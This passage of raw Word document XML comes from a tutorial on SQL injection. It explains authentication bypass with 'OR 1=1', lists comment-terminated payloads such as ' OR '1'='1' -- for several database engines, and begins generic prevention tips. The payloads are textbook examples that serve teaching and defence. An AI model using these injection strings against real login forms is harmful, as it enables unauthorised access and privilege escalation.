      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> statement, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> clause returns the first </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> table no matter what the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> are. The first user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> in a database is very often the administrator. In this way, the attacker not only bypasses authentication but also gains administrator privileges. They can also comment out the rest of the SQL statement to control the execution of the SQL query further:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EEF099" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390DE2C" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A8077F" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54343E85" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-- MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F54AC" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45703AF4" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-- Access (using null characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D926ED7" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B323E4" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>%16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C3012" w14:textId="77777777" w:rsidR="00833676" w:rsidRDefault="00833676" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="CFD6D9"/>
        <w:spacing w:before="300" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax" w:cs="Open Sans"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FD9EDF" w14:textId="77777777" w:rsidR="00833676" w:rsidRPr="00833676" w:rsidRDefault="00833676" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E17A59" w14:textId="77777777" w:rsidR="005274D2" w:rsidRDefault="005274D2" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4264EB1A" w14:textId="77777777" w:rsidR="005274D2" w:rsidRDefault="005274D2" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D5989D" w14:textId="77777777" w:rsidR="005274D2" w:rsidRDefault="005274D2" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC4B245" w14:textId="349C14C5" w:rsidR="00833676" w:rsidRDefault="00833676" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833676">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DIAGRAMATIC DEMO OF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00833676">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833676">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>INJECTION:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13B6E4A2" w14:textId="10498CEF" w:rsidR="00542909" w:rsidRDefault="00542909" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B0694A" wp14:editId="7705572E">
            <wp:extent cx="4667250" cy="5076825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="31165595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655955" name="Picture 31165595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67250" cy="5076825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414CA47" w14:textId="77777777" w:rsidR="00833676" w:rsidRPr="00833676" w:rsidRDefault="00833676" w:rsidP="00833676">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA03AD3" w14:textId="77777777" w:rsidR="00833676" w:rsidRPr="00833676" w:rsidRDefault="00833676" w:rsidP="00833676"/>
    <w:p w14:paraId="7ED667C2" w14:textId="70B02A85" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="CFD6D9"/>
        <w:spacing w:before="300" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax" w:cs="Open Sans"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax" w:cs="Open Sans"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How to Prevent SQL Injections (SQLi) – Generic Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02578660" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="CFD6D9"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Preventing SQL Injection vulnerabilities is not easy. Specific prevention techniques depend on the subtype of SQLi vulnerability, on the SQL database engine, and on the programming language. However, there are certain general strategic principles that you should follow to keep your web application safe.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6"/>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="000917AA" w14:paraId="21B62AEE" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72CABEF4" w14:textId="12497D62" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="670C8BAE" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>Step 1: Train and maintain awareness</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6757787C" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">To keep your web application safe, everyone involved in building the web application must be aware of the risks associated with SQL Injections. You should provide suitable security training </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">to all your developers, QA staff, DevOps, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SysAdmins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>. You can start by referring them to this page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000917AA" w14:paraId="6CC9EB95" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6499A5EE" w14:textId="285BE1F5" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:bookmarkStart w:id="0" w:name="step2"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757F8183" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>Step 2: Don’t trust any user input</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37986791" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Treat all user input as untrusted. Any user input that is used in an SQL query introduces a risk of an SQL Injection. Treat input from authenticated and/or internal users the same way that you treat public input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000917AA" w14:paraId="666C3D4F" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="195F9F07" w14:textId="67F8472C" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:bookmarkStart w:id="1" w:name="step3"/>
            <w:bookmarkEnd w:id="1"/>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59591456" w14:textId="77777777" w:rsidR="005B67E9" w:rsidRDefault="005B67E9" w:rsidP="005B67E9">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CB8D1F4" w14:textId="77777777" w:rsidR="005B67E9" w:rsidRDefault="005B67E9" w:rsidP="005B67E9">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D7E38D0" w14:textId="77777777" w:rsidR="00547DCF" w:rsidRDefault="00547DCF" w:rsidP="005B67E9">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0272E434" w14:textId="5770CD3B" w:rsidR="005B67E9" w:rsidRDefault="000917AA" w:rsidP="005B67E9">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
